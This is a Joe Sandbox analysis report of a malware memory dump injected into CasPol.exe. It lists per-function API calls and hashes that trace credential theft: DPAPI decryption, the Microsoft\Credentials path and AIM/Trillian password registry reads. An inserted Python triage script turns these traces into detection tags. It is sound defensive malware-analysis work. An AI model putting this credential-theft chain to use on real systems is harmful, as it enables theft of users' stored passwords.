                                                                                                                                                                                    • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 0040699E
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004040EC,00000001,?,?,00000000,004038B8,?), ref: 004069B6
                                                                                                                                                                                    • free.MSVCRT ref: 004069BF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: 7e4423998a5bf6bfb607acc7ce6a47bafa0b80d87e5f9d0a99af9475c24ad546
                                                                                                                                                                                    • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e4423998a5bf6bfb607acc7ce6a47bafa0b80d87e5f9d0a99af9475c24ad546
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,CryptUnprotectData), ref: 004103C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version_mbscpy
                                                                                                                                                                                    • String ID: CryptUnprotectData
                                                                                                                                                                                    • API String ID: 1856898028-1975210251
                                                                                                                                                                                    • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                                                                                                                                                                    • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                                                                                                                                                                    • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 1439213657-3817206916
                                                                                                                                                                                    • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                                                                                                    • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                                                                                                    • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E695
                                                                                                                                                                                      • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040E6B1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CompareFileTimememsetstrrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4226234548-0
                                                                                                                                                                                    • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                                                                                                                                                                    • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                                                                                                                                                                    • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004043A1
                                                                                                                                                                                      • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                      • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                      • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                      • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                                                                                                                                                                      • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                                                                                                                                                                      • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscat$FolderPathSpecial_strnicmpmemset
                                                                                                                                                                                    • String ID: Microsoft\Credentials
                                                                                                                                                                                    • API String ID: 3139367858-3148402405
                                                                                                                                                                                    • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                                                                                                                                                                    • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
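The per-function records above are only useful if they are read together: the `_mbscpy` call that copies the string `CryptUnprotectData`, the `_strcmpi` against `/stext`, the paired `VirtualProtect` calls, and the `SHGetSpecialFolderPathA(..., 0x1A, ...)` lookup followed by the string `Microsoft\Credentials` each mean little alone, but in one dump they describe DPAPI-based credential access plus in-memory code patching. The following helper, added here as an editor's example and not part of the Joe Sandbox report or of the sample, parses the "APIs / Strings / Similarity" blocks in the form rendered on this page and tags the combinations an analyst would act on. The sample input is a constructed excerpt of four records copied from this section; the tag names are the editor's own; `CSIDL_APPDATA = 0x1A` is the documented Windows folder id for `%APPDATA%`; and the reading of `/stext` as the NirSoft save-as-text switch is the usual interpretation for Remcos, which the report's signatures ("Contains functionality to steal Chrome/Firefox passwords") support but do not state outright, so it is labelled as an assumption in the code.

```python
"""Triage helper for the per-function records emitted by the Joe Sandbox IDA
plugin (the "APIs / Strings / Similarity" blocks in this report).
Added editor example; not part of the report or of the Remcos sample."""
import re
from typing import Dict, List, Set

# Constructed input: four records copied from the CasPol.exe memory dump
# records above, trimmed to the fields the parser uses.
SAMPLE_RECORDS = r"""
APIs
• Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
• _mbscpy.MSVCRT(00000000,CryptUnprotectData), ref: 004103C3
Similarity
• API ID: Version_mbscpy
• String ID: CryptUnprotectData
• Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
Memory Dump Source
Similarity
• API ID: _strcmpi
• String ID: /stext
• Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
APIs
• VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
• VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
Similarity
• API ID: ProtectVirtual
• String ID:
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
APIs
• memset.MSVCRT ref: 004043A1
• Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
Strings
Similarity
• API ID: strlen$_mbscat$FolderPathSpecial_strnicmpmemset
• String ID: Microsoft\Credentials
• Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
"""

CSIDL_APPDATA = 0x1A  # SHGetSpecialFolderPath folder id for %APPDATA%

# Headers that open the next record once a Similarity section has been read.
RECORD_HEADERS = {"APIs", "Strings", "Memory Dump Source"}
FIELD_RE = re.compile(
    r"^[•*-]?\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File|Snapshot File):\s*(.*)$")
API_RE = re.compile(
    r"^[•*-]?\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z_]\w*)\.([A-Za-z0-9_]+)(?:\(([^)]*)\))?(?:.*?\bref:\s*([0-9A-Fa-f]+))?")


def parse_records(text: str) -> List[Dict]:
    """Split the plugin output into one dict per function (APIs + Similarity fields)."""
    records: List[Dict] = []
    cur: Dict = {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in RECORD_HEADERS:
            if "api_id" in cur:  # the previous record already has its Similarity block
                records.append(cur)
                cur = {"apis": []}
            continue
        m = FIELD_RE.match(line)
        if m:
            cur[m.group(1).lower().replace(" ", "_")] = m.group(2).strip()
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group(4).split(",")] if m.group(4) else []
            cur["apis"].append({"subcall": m.group(1), "name": m.group(2),
                                "module": m.group(3), "args": args, "ref": m.group(5)})
    if "api_id" in cur:
        records.append(cur)
    return records


def classify(rec: Dict) -> Set[str]:
    """Tag one function with the behaviours its API/string combination indicates."""
    tags: Set[str] = set()
    names = [a["name"] for a in rec["apis"]]
    string_id = rec.get("string_id", "")
    if "CryptUnprotectData" in string_id or "CryptUnprotectData" in names:
        tags.add("dpapi_decrypt")            # DPAPI blob decryption (resolved by name here)
    if string_id.endswith("Microsoft\\Credentials"):
        tags.add("credential_vault_path")    # Credential Manager blob directory
    if string_id == "/stext":
        tags.add("nirsoft_stext_switch")     # assumption: NirSoft save-as-text switch
    if names.count("VirtualProtect") >= 2 or "ProtectVirtual" in rec.get("api_id", ""):
        tags.add("memory_protection_change")  # protect / write / restore pattern
    if {"WritePrivateProfileStringA", "GetPrivateProfileStringA"} & set(names):
        tags.add("ini_settings")
    for api in rec["apis"]:
        if api["name"].startswith("SHGetSpecialFolderPath") and len(api["args"]) > 2:
            try:
                if int(api["args"][2], 16) == CSIDL_APPDATA:
                    tags.add("appdata_lookup")
            except ValueError:  # argument was "?" (not recovered by the plugin)
                pass
    return tags


def triage(text: str) -> Dict[str, List[str]]:
    """Map each flagged function (keyed by Opcode ID) to its sorted tags."""
    out: Dict[str, List[str]] = {}
    for rec in parse_records(text):
        tags = classify(rec)
        if tags:
            out[rec.get("opcode_id", "?")] = sorted(tags)
    return out


def behaviours(text: str) -> Set[str]:
    """Roll per-function tags up to the conclusion an analyst would report."""
    tags: Set[str] = set()
    for t in triage(text).values():
        tags.update(t)
    if {"credential_vault_path", "appdata_lookup", "dpapi_decrypt"} <= tags:
        tags.add("credential_manager_theft")  # %APPDATA%\Microsoft\Credentials + DPAPI
    return tags


if __name__ == "__main__":
    for opcode_id, tags in triage(SAMPLE_RECORDS).items():
        print(opcode_id[:16], ", ".join(tags))
    print("behaviours:", ", ".join(sorted(behaviours(SAMPLE_RECORDS))))
```

The roll-up is the point: a single `VirtualProtect` pair or a lone `CryptUnprotectData` import is common in benign software, but the APPDATA lookup plus the `Microsoft\Credentials` suffix plus DPAPI decryption in the same injected image is the Credential Manager theft chain, and that is what the `credential_manager_theft` tag requires before it fires. Run it over the full set of records for a dump (paste the text of this section) rather than the excerpt to see every flagged function.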
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString$Write
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2948465352-0
                                                                                                                                                                                    • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                                                                                                                                                                    • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2760881011-0
                                                                                                                                                                                    • Opcode ID: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                    • Instruction ID: c686a64e774c0d910729c20308bd6d7dac36cbeeda648e68b024901bbde96cda
                                                                                                                                                                                    • Opcode Fuzzy Hash: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DC00239000A01DFD7219FA0E808BE5BBF4BF48342FA8496DE1C581064E7799594CF48
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D9E1
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D9F8
                                                                                                                                                                                      • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                                                                                                                                                                      • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                                                                                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Closememcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1317463181-0
                                                                                                                                                                                    • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                                                                                                                                                                    • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                                                                                                                                                                      • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                                                                                                                                                                      • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000), ref: 00406D4F
                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$FileTime$CloseCompareHandlememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3621460190-0
                                                                                                                                                                                    • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                                                                                                    • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                                                                                                                                                                    • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,00000000,00000000), ref: 00411DE3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: ce370e884ce507cf8d68f29c6deb264c45e70fef735a89ca04c9f3106877318e
                                                                                                                                                                                    • Instruction ID: e75928c52d3f354008a7740bfd8d53285fea356ba949639daa147f4e4c12ed07
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce370e884ce507cf8d68f29c6deb264c45e70fef735a89ca04c9f3106877318e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE0ED7A600108BBDF119F96ED069DE7BA9EF84355B104025FE0191121E631EE50DA54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                    • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                                                                                                                                                                    • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                                                                                                                                                                      • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                                                                                                                                                                      • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                                                                                                                                                                      • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                    • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                                                                                                    • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2928410991-0
                                                                                                                                                                                    • Opcode ID: a06bf5f15d9de0ab9359c487783e21236e19a74e9470d356b60f65c87538d07b
                                                                                                                                                                                    • Instruction ID: cd556759a7b58b048314e6dc47e00111cf408287f7a5d392ad8679ce4621aa7a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a06bf5f15d9de0ab9359c487783e21236e19a74e9470d356b60f65c87538d07b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82D042B550010EBFDB01DFA0DD05DEA7BBDEB04248F008061BD15D6150D6719A15ABA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004067E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                                                                                                                                                                    • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
